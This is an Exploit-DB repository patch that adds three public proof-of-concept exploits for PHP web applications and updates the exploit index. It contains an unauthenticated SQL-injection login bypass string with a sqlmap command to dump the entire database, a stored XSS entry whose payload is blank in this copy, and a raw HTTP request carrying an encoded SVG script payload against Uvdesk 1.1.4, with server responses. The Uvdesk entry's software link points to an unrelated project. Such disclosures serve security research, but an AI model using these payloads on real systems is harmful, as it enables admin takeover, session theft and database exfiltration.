From fe2c42ff0efb324bf62eb2066df059ab5399c08d Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 25 Aug 2023 00:16:28 +0000 Subject: [PATCH] DB: 2023-08-25 4 changes to exploits/shellcodes/ghdb User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated) User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS) Uvdesk 1.1.4 - Stored XSS (Authenticated) --- exploits/php/webapps/51694.txt | 33 ++++++++ exploits/php/webapps/51695.txt | 39 +++++++++ exploits/php/webapps/51696.txt | 140 +++++++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 215 insertions(+) create mode 100644 exploits/php/webapps/51694.txt create mode 100644 exploits/php/webapps/51695.txt create mode 100644 exploits/php/webapps/51696.txt diff --git a/exploits/php/webapps/51694.txt b/exploits/php/webapps/51694.txt new file mode 100644 index 000000000..66cfe3255 --- /dev/null +++ b/exploits/php/webapps/51694.txt @@ -0,0 +1,33 @@ +# Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS) +# Google Dork: NA +# Date: 19/08/2023 +# Exploit Author: Ashutosh Singh Umath +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ +# Version: 3.0 +# Tested on: Windows 11 +# CVE : Requested + + +Description + +User Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable to +Persistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed. + +POC + +User side +1. Go to the user registration page http://localhost/loginsystem. +2. Enter in one of the +fields (first name, last name, email, or contact). +3. Click sign up. + +Admin side +1. Login to admin panel http://localhost/loginsystem/admin. +2. After login successfully go to manage user page. +3. Payload + + +Thanks and Regards, + +Ashutosh Singh Umath \ No newline at end of file diff --git a/exploits/php/webapps/51695.txt b/exploits/php/webapps/51695.txt new file mode 100644 index 000000000..ec64e77a1 --- /dev/null +++ b/exploits/php/webapps/51695.txt @@ -0,0 +1,39 @@ +# Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated) +# Google Dork: NA +# Date: 19/08/2023 +# Exploit Author: Ashutosh Singh Umath +# Vendor Homepage: https://phpgurukul.com +# Software Link: +https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ +# Version: 3.0 +# Tested on: Windows 11 +# CVE : Requested + + +Proof Of Concept: + +1. Navigate to the admin login page. + +URL: http://192.168.1.5/loginsystem/admin/ + +2. Enter "*admin' -- -*" in the admin username field and anything +random in the password field. + +3. Now you successfully logged in as admin. + +4. To download all the data from the database, use the below commands. + + 4.1. Login to the admin portal and capture the request. + + 4.2. Copy the intercepted request in a file. + + 4.3. Now use the below command to dump all the data + + +Command: sqlmap -r -p username -D loginsystem --dump-all + + + +Thanks and Regards, + +Ashutosh Singh Umath \ No newline at end of file diff --git a/exploits/php/webapps/51696.txt b/exploits/php/webapps/51696.txt new file mode 100644 index 000000000..e1ddc0f22 --- /dev/null +++ b/exploits/php/webapps/51696.txt @@ -0,0 +1,140 @@ +# Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated) +# Date: 14/08/2023 +# Exploit Author: Hubert Wojciechowski +# Contact Author: hub.woj12345@gmail.com +# Vendor Homepage: https://www.uvdesk.com/ +# Software Link: https://github.com/MegaTKC/AeroCMS +# Version: 1.1.4 +# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 + +# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion. + +## Example XSS Stored in new ticket + +----------------------------------------------------------------------------------------------------------------------- +Param: reply +----------------------------------------------------------------------------------------------------------------------- +Req +----------------------------------------------------------------------------------------------------------------------- + +POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1 +Host: 127.0.0.1 +Content-Length: 812 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +Upgrade-Insecure-Requests: 1 +Origin: http://127.0.0.1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1 +Accept-Encoding: gzip, deflate +Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3 +Connection: close + +------WebKitFormBoundaryXCjJcGbgZxZWLsSk +Content-Disposition: form-data; name="threadType" + +forward +------WebKitFormBoundaryXCjJcGbgZxZWLsSk +Content-Disposition: form-data; name="status" + + +------WebKitFormBoundaryXCjJcGbgZxZWLsSk +Content-Disposition: form-data; name="subject" + +aaaa +------WebKitFormBoundaryXCjJcGbgZxZWLsSk +Content-Disposition: form-data; name="to[]" + +test@local.host +------WebKitFormBoundaryXCjJcGbgZxZWLsSk +Content-Disposition: form-data; name="reply" + +%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E +------WebKitFormBoundaryXCjJcGbgZxZWLsSk +Content-Disposition: form-data; name="pic"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryXCjJcGbgZxZWLsSk +Content-Disposition: form-data; name="nextView" + +stay +------WebKitFormBoundaryXCjJcGbgZxZWLsSk-- + + +----------------------------------------------------------------------------------------------------------------------- +Res: +----------------------------------------------------------------------------------------------------------------------- + +HTTP/1.1 302 Found +Date: Mon, 14 Aug 2023 11:33:26 GMT +Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 +X-Powered-By: PHP/7.4.29 +Cache-Control: max-age=0, must-revalidate, private +Location: /uvdesk/public/en/member/ticket/view/1 +Access-Control-Allow-Origin: * +Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS +Access-Control-Allow-Headers: Access-Control-Allow-Origin +Access-Control-Allow-Headers: Authorization +Access-Control-Allow-Headers: Content-Type +X-Debug-Token: bf1b73 +X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73 +X-Robots-Tag: noindex +Expires: Mon, 14 Aug 2023 11:33:26 GMT +Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 398 + + + + + + + + Redirecting to /uvdesk/public/en/member/ticket/view/1 + + + Redirecting to /uvdesk/public/en/member/ticket/view/1. + + +----------------------------------------------------------------------------------------------------------------------- +Redirect and view response: +----------------------------------------------------------------------------------------------------------------------- +HTTP/1.1 200 OK +Date: Mon, 14 Aug 2023 11:44:14 GMT +Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 +X-Powered-By: PHP/7.4.29 +Cache-Control: max-age=0, must-revalidate, private +Access-Control-Allow-Origin: * +Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS +Access-Control-Allow-Headers: Access-Control-Allow-Origin +Access-Control-Allow-Headers: Authorization +Access-Control-Allow-Headers: Content-Type +X-Debug-Token: 254ce8 +X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8 +X-Robots-Tag: noindex +Expires: Mon, 14 Aug 2023 11:44:14 GMT +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 300607 + + + + + #1 vvvvvvvvvvvvvvvvvvvvv +[...] +

+[...] +----------------------------------------------------------------------------------------------------------------------- + +XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 50cb6ca19..8080c8994 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -31333,6 +31333,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,,2020-12-03,2020-12-07,0,,,,,, 49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php,,2020-11-16,2020-11-16,0,,,,,, 48932,exploits/php/webapps/48932.txt,"User Registration & Login and User Management System 2.1 - SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,,2020-10-23,2020-10-23,0,,,,,, +51695,exploits/php/webapps/51695.txt,"User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)",2023-08-24,"Ashutosh Singh Umath",webapps,php,,2023-08-24,2023-08-24,1,,,,,, +51694,exploits/php/webapps/51694.txt,"User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)",2023-08-24,"Ashutosh Singh Umath",webapps,php,,2023-08-24,2023-08-24,1,,,,,, 48914,exploits/php/webapps/48914.txt,"User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS",2020-10-20,yusufmalikul,webapps,php,,2020-10-20,2020-10-20,0,,,,,, 19174,exploits/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution",2012-06-15,mr_me,webapps,php,,2012-06-15,2012-06-15,1,OSVDB-83162;OSVDB-82970;OSVDB-82969;OSVDB-82968,,,http://www.exploit-db.com/screenshots/idlt19500/2.png,, 7530,exploits/php/webapps/7530.pl,"Userlocator 3.0 - Blind SQL Injection",2008-12-21,katharsis,webapps,php,,2008-12-20,2017-01-05,1,OSVDB-51232;CVE-2008-5863,,,,, @@ -31348,6 +31350,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,,2005-10-05,,1,OSVDB-19942;CVE-2005-3201,,,,, 18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,,2012-04-08,2012-04-08,1,OSVDB-80986;CVE-2012-4325,,,,http://www.exploit-db.comnewspro140b.zip, 13854,exploits/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",webapps,php,,2010-06-12,,1,CVE-2010-5009;CVE-2010-5007;OSVDB-76896;OSVDB-76894,,,,, +51696,exploits/php/webapps/51696.txt,"Uvdesk 1.1.4 - Stored XSS (Authenticated)",2023-08-24,"Hubert Wojciechowski",webapps,php,,2023-08-24,2023-08-24,0,,,,,, 51639,exploits/php/webapps/51639.py,"Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)",2023-07-31,"Daniel Barros",webapps,php,,2023-07-31,2023-08-02,1,CVE-2023-39147,,,,, 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,,2018-03-02,2018-03-02,1,CVE-2018-7490,,,,http://www.exploit-db.comuwsgi-2.0.15.tar.gz, 34218,exploits/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,webapps,php,,2010-06-28,2014-07-31,1,,,,,,https://www.securityfocus.com/bid/41204/info